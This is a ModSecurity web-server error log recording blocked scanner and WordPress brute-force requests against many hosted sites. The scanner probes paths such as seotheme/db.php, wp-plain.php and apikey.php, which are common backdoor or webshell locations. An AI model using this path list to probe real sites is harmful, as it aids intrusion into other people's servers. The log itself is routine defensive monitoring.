[Tue May 26 19:58:45.200214 2026] [security2:error] [pid 93868:tid 94125] [remote 74.91.224.220:33782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ukQABoTU"]
[Tue May 26 19:58:45.218340 2026] [security2:error] [pid 93868:tid 94369] [client 45.92.1.17:53130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/lzkjeahg.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ulQAAAf4"], referer: www.google.com
[Tue May 26 19:58:45.236364 2026] [security2:error] [pid 93868:tid 94316] [client 45.92.1.17:53050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ulgAAAck"], referer: www.google.com
[Tue May 26 19:58:45.245605 2026] [security2:error] [pid 93868:tid 94282] [client 45.92.1.17:53148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/lughekoe.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25umQAAAac"], referer: www.google.com
[Tue May 26 19:58:45.247011 2026] [security2:error] [pid 93868:tid 94299] [client 45.92.1.17:53132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/zvvyxwak.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25umgAAAbg"], referer: www.google.com
[Tue May 26 19:58:45.271950 2026] [security2:error] [pid 93868:tid 94341] [client 45.92.1.17:53097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25unQAAAeI"], referer: www.google.com
[Tue May 26 19:58:45.273073 2026] [security2:error] [pid 93868:tid 94339] [client 45.92.1.17:53170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25ungAAAeA"]
[Tue May 26 19:58:45.278583 2026] [security2:error] [pid 93868:tid 94343] [client 45.92.1.17:53098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25unwAAAeQ"], referer: www.google.com
[Tue May 26 19:58:45.281613 2026] [security2:error] [pid 93868:tid 94362] [client 45.92.1.17:53184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/xqvvazyw.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uoAAAAfc"], referer: www.google.com
[Tue May 26 19:58:45.295452 2026] [security2:error] [pid 93868:tid 94310] [client 45.92.1.17:53103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uoQAAAcM"], referer: www.google.com
[Tue May 26 19:58:45.309079 2026] [security2:error] [pid 93576:tid 93790] [client 45.92.1.17:53213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/neiqpdll.php"] [unique_id "ahWuHWDRMqfxdEDkosznMwAAAE4"], referer: www.google.com
[Tue May 26 19:58:45.358940 2026] [security2:error] [pid 93868:tid 94335] [client 45.92.1.17:53127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25upgAAAdw"], referer: www.google.com
[Tue May 26 19:58:45.377431 2026] [security2:error] [pid 93868:tid 94315] [client 45.92.1.17:53261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/zthfwlra.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uqQAAAcg"], referer: www.google.com
[Tue May 26 19:58:45.380399 2026] [security2:error] [pid 93868:tid 94368] [client 45.92.1.17:53250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/hbrutupn.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uqgAAAf0"], referer: www.google.com
[Tue May 26 19:58:45.387846 2026] [security2:error] [pid 93868:tid 94280] [client 45.92.1.17:53139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uqwAAAaU"], referer: www.google.com
[Tue May 26 19:58:45.390822 2026] [security2:error] [pid 93868:tid 94365] [client 45.92.1.17:53146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25urAAAAfo"], referer: www.google.com
[Tue May 26 19:58:45.393834 2026] [security2:error] [pid 93868:tid 94316] [client 45.92.1.17:53151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25urQAAAck"], referer: www.google.com
[Tue May 26 19:58:45.398593 2026] [security2:error] [pid 93868:tid 94262] [client 45.92.1.17:53286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25urwAAAZM"]
[Tue May 26 19:58:45.412057 2026] [security2:error] [pid 93576:tid 93763] [client 45.92.1.17:52798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHWDRMqfxdEDkosznNQAAADM"]
[Tue May 26 19:58:45.416708 2026] [security2:error] [pid 93868:tid 94281] [client 45.92.1.17:53304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25usgAAAaY"]
[Tue May 26 19:58:45.418769 2026] [security2:error] [pid 93868:tid 94263] [client 45.92.1.17:53303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uswAAAZQ"], referer: www.google.com
[Tue May 26 19:58:45.419193 2026] [security2:error] [pid 93868:tid 94278] [client 45.92.1.17:53302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25utAAAAaM"], referer: www.google.com
[Tue May 26 19:58:45.421514 2026] [security2:error] [pid 93868:tid 94361] [client 45.92.1.17:53167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25utQAAAfY"], referer: www.google.com
[Tue May 26 19:58:45.430496 2026] [security2:error] [pid 93868:tid 94330] [client 45.92.1.17:53186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25utwAAAdc"], referer: www.google.com
[Tue May 26 19:58:45.437349 2026] [security2:error] [pid 93868:tid 94320] [client 45.92.1.17:53048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uugAAAc0"]
[Tue May 26 19:58:45.456421 2026] [security2:error] [pid 93576:tid 93787] [client 45.92.1.17:53212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHWDRMqfxdEDkosznNgAAAEs"], referer: www.google.com
[Tue May 26 19:58:45.462618 2026] [security2:error] [pid 93868:tid 94322] [client 45.92.1.17:52930] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uuwAAAc8"]
[Tue May 26 19:58:45.467938 2026] [security2:error] [pid 93868:tid 94308] [client 45.92.1.17:52929] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWuHEqK9k_ZUB2Vp25uYgAAAcE"], referer: www.google.com
[Tue May 26 19:58:45.489403 2026] [security2:error] [pid 93868:tid 94360] [client 45.92.1.17:53225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uvAAAAfU"], referer: www.google.com
[Tue May 26 19:58:45.506746 2026] [security2:error] [pid 93868:tid 94356] [client 45.92.1.17:53361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uwAAAAfE"]
[Tue May 26 19:58:45.506782 2026] [security2:error] [pid 93868:tid 94352] [client 45.92.1.17:53371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uwQAAAe0"], referer: www.google.com
[Tue May 26 19:58:45.507438 2026] [security2:error] [pid 93868:tid 94344] [client 45.92.1.17:53380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uwgAAAeU"], referer: www.google.com
[Tue May 26 19:58:45.518063 2026] [security2:error] [pid 93868:tid 94318] [client 45.92.1.17:53229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "m2wealthadvisor.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uyAAAAcs"], referer: www.google.com
[Tue May 26 19:58:45.531914 2026] [security2:error] [pid 93868:tid 94321] [client 45.92.1.17:53255] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uyQAAAc4"], referer: www.google.com
[Tue May 26 19:58:45.534184 2026] [security2:error] [pid 93868:tid 94277] [client 45.92.1.17:53273] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uygAAAaI"], referer: www.google.com
[Tue May 26 19:58:45.534804 2026] [security2:error] [pid 93868:tid 94378] [client 45.92.1.17:53260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uywAAAgc"], referer: www.google.com
[Tue May 26 19:58:45.548052 2026] [security2:error] [pid 93868:tid 94300] [client 45.92.1.17:53284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uzAAAAbk"], referer: www.google.com
[Tue May 26 19:58:45.564720 2026] [security2:error] [pid 93868:tid 94260] [client 45.92.1.17:53412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuHUqK9k_ZUB2Vp25uzgAAAZE"]
[Tue May 26 19:58:45.581764 2026] [core:error] [pid 93868:tid 94306] (104)Connection reset by peer: [client 45.92.1.17:53301] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:58:45.612514 2026] [security2:error] [pid 93868:tid 94298] [client 45.92.1.17:53375] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25uvwAAAbc"], referer: www.google.com
[Tue May 26 19:58:45.660771 2026] [security2:error] [pid 93868:tid 94358] [client 45.92.1.17:53384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u2QAAAfM"], referer: www.google.com
[Tue May 26 19:58:45.691428 2026] [security2:error] [pid 93868:tid 94117] [remote 74.91.224.220:33782] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.224.91.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u0gABxTE"], referer: https://avprealty.com/wp-login.php
[Tue May 26 19:58:45.697471 2026] [security2:error] [pid 93868:tid 94357] [client 45.92.1.17:53525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWuHUqK9k_ZUB2Vp25u3QAAAfI"]
[Tue May 26 19:58:45.702859 2026] [security2:error] [pid 93868:tid 94328] [client 45.92.1.17:53407] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u3gAAAdU"], referer: www.google.com
[Tue May 26 19:58:45.706547 2026] [security2:error] [pid 93868:tid 94301] [client 45.92.1.17:53410] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u3wAAAbo"], referer: www.google.com
[Tue May 26 19:58:45.709767 2026] [security2:error] [pid 93868:tid 94281] [client 45.92.1.17:53544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "ktmadvance-senegal.com"] [uri "/hwxlapky.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u4AAAAaY"], referer: www.google.com
[Tue May 26 19:58:45.711341 2026] [security2:error] [pid 93868:tid 94350] [client 45.92.1.17:53530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u4QAAAes"]
[Tue May 26 19:58:45.713476 2026] [security2:error] [pid 93868:tid 94366] [client 45.92.1.17:53421] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/gtcftfqi.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u4gAAAfs"], referer: www.google.com
[Tue May 26 19:58:45.718919 2026] [security2:error] [pid 93868:tid 94296] [client 45.92.1.17:53433] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u4wAAAbU"], referer: www.google.com
[Tue May 26 19:58:45.727083 2026] [security2:error] [pid 93868:tid 94361] [client 45.92.1.17:53556] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u5QAAAfY"]
[Tue May 26 19:58:45.732817 2026] [security2:error] [pid 93868:tid 94330] [client 45.92.1.17:52740] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.srsglobalsoft.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u5gAAAdc"]
[Tue May 26 19:58:45.752209 2026] [security2:error] [pid 93868:tid 94320] [client 45.92.1.17:53562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lifestylemne.me"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u6gAAAc0"]
[Tue May 26 19:58:45.759440 2026] [security2:error] [pid 93868:tid 94282] [client 45.92.1.17:53457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-plain.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u7QAAAac"], referer: www.google.com
[Tue May 26 19:58:45.761800 2026] [security2:error] [pid 93868:tid 94311] [client 45.92.1.17:53456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/sovmjibm.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u7wAAAcQ"], referer: www.google.com
[Tue May 26 19:58:45.772020 2026] [security2:error] [pid 93868:tid 94269] [client 45.92.1.17:53001] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25udQAAAZo"], referer: www.google.com
[Tue May 26 19:58:45.782224 2026] [security2:error] [pid 93576:tid 93713] [client 45.92.1.17:53593] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "virgence.com"] [uri "/wp-plain.php"] [unique_id "ahWuHWDRMqfxdEDkosznOAAAAAE"], referer: www.google.com
[Tue May 26 19:58:45.783986 2026] [security2:error] [pid 93868:tid 94332] [client 45.92.1.17:52929] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahWuHUqK9k_ZUB2Vp25u6QAAAdk"], referer: www.google.com
